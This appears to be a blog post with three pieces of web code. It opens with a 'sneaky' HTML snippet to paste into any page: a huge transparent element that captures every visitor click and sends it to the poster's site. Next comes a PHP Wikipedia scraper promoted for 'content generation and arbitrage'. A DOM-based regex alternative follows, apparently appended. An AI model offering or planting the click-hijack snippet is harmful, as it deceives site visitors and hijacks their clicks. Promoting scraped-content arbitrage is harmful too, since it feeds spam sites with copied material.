This is an easy one, just edit any page and add this code (Change http://www.yourlink.com? to your actual site):
| <p style="font-size: 50000px; left: -50px; width: 100%; position: absolute; top: -50px; height: 100%; font-color: transparent">[http://www.yourlink.com/]</p> |
Now whenever a visitor clicks on a link, it will be sent automatically to your site
…Sneaky
Here is a snippet from [YACG] (Yet Another Content Generator) that scrapes Wikipedia articles. Great for content generation and arbitrage.
Usage:
<?php wikipedia("http://en.wikipedia.org/wiki/Google"); ?>
Code:
<?php
function wikipedia($article) {
$pattern[0] = '/<a href="(.*?)">(.*?)<\\/a>/';
$replace[0] = '$2';
$pattern[1] = '/<h3 id=\"siteSub\">From Wikipedia, the free encyclopedia<\/h3>/';
$replace[1] = '';
$pattern[2] = '/<div id=\"contentSub\">(.*?)<\/div><div id=\"jump-to-nav\">Jump to: navigation, search<\/div>/';
$replace[2] = '';
$pattern[3] = '/<div class=\"messagebox cleanup metadata\">(.*?)<p><br \/><\/p>/';
$replace[3] = '';
$pattern[4] = '/<table class=\"messagebox\" (.*?)>(.*?)<\/table>/';
$replace[4] = '';
$pattern[5] = '/<dl>(.*?)<\/dl>/';
$replace[5] = '';
$pattern[6] = '/<h1 class=\"firstHeading\">(.*?)<\/h1>/';
$replace[6] = '<h3>$1</h3>';
$pattern[7] = '/<table class=\"messagebox protected\" style=\"border: 1px solid #8888aa; padding: 0px; font-size:9pt;\">(.*?)<\/table>/';
$replace[7] = '';
$pattern[8] = '/<div class=\"infobox sisterproject\">(.*?)<\/div><\/div>/';
$replace[8] = '';
$pattern[9] = '/<sup (.*?)>(.*?)<\/sup>/';
$replace[9] = '';
$pattern[10] = '/<table style=\"background: transparent;\" width=\"0\">(.*?)<\/table>/';
$replace[10] = '';
$pattern[11] = '/<table class=\"messagebox current\" style=\"font-size: normal;\">(.*?)<\/table>/';
$replace[11] = '';
$pattern[12] = '/<table class=\"toccolours\" align=\"center\" width=\"55%\" cellpadding=\"0\" cellspacing=\"0\">(.*?)<\/table>/';
$replace[12] = '';
$pattern[13] = '/<div class=\"editsection\"(.*?)>(.*?)<\/div>/';
$replace[13] = '';
$pattern[14] = '/<div id=\"bodyContent\">/';
$replace[14] = '<div>';
$pattern[15] = '/<dd>(.*?)<\/dd>/';
$replace[15] = '';
$pattern[16] = '/<div class=\"messagebox cleanup metadata\">(.*?)<\/div>/';
$replace[16] = '';
$pattern[17] = '/<div class=\"thumbcaption\">(.*?)<\/div><\/div>/';
$replace[17] = '';
$pattern[18] = '/<div class=\"thumb tright\">/';
$replace[18] = '';
$pattern[19] = '/\[(.*?)\]/';
$replace[19] = '';
$pattern[20] = '/<table class="messagebox protected" (.*?)>(.*?)<\/table>/';
$replace[20] = '';
$pattern[21] = '/<div style="position:absolute; z-index:100; right:20px; top:10px; height:10px; width:300px;"><\/div>/';
$replace[21] = '';
$pattern[22] = '/<div style="position:absolute; z-index:100; right:10px; top:10px;" class="metadata" id="administrator">(.*?)<\/div><\/div>/';
$replace[22] = '';
$pattern[23] = '/<table class="messagebox current"(.*?)>(.*?)<\/table>/';
$replace[23] = '';
$pattern[24] = '/<table class="messagebox current" style="width: auto;">(.*?)<\/table>/';
$replace[24] = '';
$pattern[25] = '/<div class="dablink">(.*?)<\/div>/';
$replace[25] = '';
$pattern[26] = '/<b>/';
$replace[26] = '<strong>';
$pattern[27] = '/<\/b>/';
$replace[27] = '</strong>';
$pattern[28] = '/<div(.*?)>/';
$replace[28] = '';
$pattern[29] = '/<\/div>/';
$replace[29] = '';
$pattern[30] = '/<map(.*?)>(.*?)<\/map>/';
$replace[30] = '';
$pattern[31] = '/<img src="(.*?)" alt="This page is semi-protected." width="18" (.*?)\/>/';
$replace[31] = '';
$pattern[32] = '/<table style="width:100%;background:none">(.*?)<\/table>/';
$replace[32] = '';
$pattern[33] = '/<div class="messagebox merge metadata">(.*?)<\/div>/';
$replace[33] = '';
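// fopen() only returns a stream handle, so read the page body as a string instead.
// Fetching a URL this way requires allow_url_fopen to be enabled in php.ini.
$wikipedia = file_get_contents($article);
if ($wikipedia === false) {
return; // the request failed, so there is nothing to print
}
$wikipedia = preg_replace($pattern, $replace, $wikipedia);
// Keep only the article body: try each known end marker in turn.
// The "s" modifier lets "." match newlines, the "i" modifier ignores case.
if (preg_match("/<\!-- start content --\>(.*)<table id=\"toc\" class=\"toc\" summary=\"(.*)\">/is", $wikipedia, $w)) {
$wikipedia = $w[1];
} elseif (preg_match("/<\!-- start content --\>(.*)<a name=\"(.*)\">/is", $wikipedia, $w)) {
$wikipedia = $w[1];
} elseif (preg_match("/<\!-- start content --\>(.*)<div class=\"boilerplate metadata\" id=\"stub\">/is", $wikipedia, $w)) {
$wikipedia = $w[1];
} elseif (preg_match("/<\!-- start content --\>(.*)<div class=\"printfooter\">/is", $wikipedia, $w)) {
$wikipedia = $w[1];
}
print $wikipedia;
}
?>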
The regexes that strip out all the trash Wikipedia adds to its articles suck, so I’m looking for someone to help me improve them. Interested? Drop me a line!
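One possible direction, offered as a rough sketch rather than a drop-in fix: parse the markup with PHP's DOM extension and remove unwanted elements by XPath query instead of by regex. The function name `clean_article_html` and the query list are hypothetical and not part of YACG. The sketch assumes the HTML has already been fetched into a string, and that the queries would need tuning against whatever markup Wikipedia currently serves.

```php
<?php
// Hypothetical helper (not part of YACG): removes unwanted elements from an
// HTML fragment using DOMDocument and DOMXPath rather than regular expressions.
function clean_article_html(string $html, array $dropQueries): string
{
    // Collect parser warnings internally instead of printing them,
    // since real-world markup is rarely perfectly valid.
    libxml_use_internal_errors(true);

    $doc = new DOMDocument();
    // The XML prefix is a common way to hint UTF-8 to loadHTML();
    // the wrapper div gives us a single known root to serialize later.
    $doc->loadHTML('<?xml encoding="UTF-8"><div id="wrap">' . $html . '</div>');
    libxml_clear_errors();

    $xpath = new DOMXPath($doc);
    foreach ($dropQueries as $query) {
        // Copy the matches into an array before detaching them from the tree.
        foreach (iterator_to_array($xpath->query($query)) as $node) {
            $node->parentNode->removeChild($node);
        }
    }

    // Serialize only the children of the wrapper, not the wrapper itself.
    $wrap = $xpath->query('//*[@id="wrap"]')->item(0);
    $out = '';
    foreach ($wrap->childNodes as $child) {
        $out .= $doc->saveHTML($child);
    }
    return $out;
}

// Example: drop footnote markers and disambiguation notes from a small fragment.
$sample = '<p>Google <sup class="reference">[1]</sup>is a company.</p>'
        . '<div class="dablink">See also</div>';
$cleaned = clean_article_html($sample, ['//sup', '//div[@class="dablink"]']);
print $cleaned;
```

Each entry in the query list stands in for one of the regex patterns above, so new kinds of clutter can be handled by adding a query instead of another multi-line pattern.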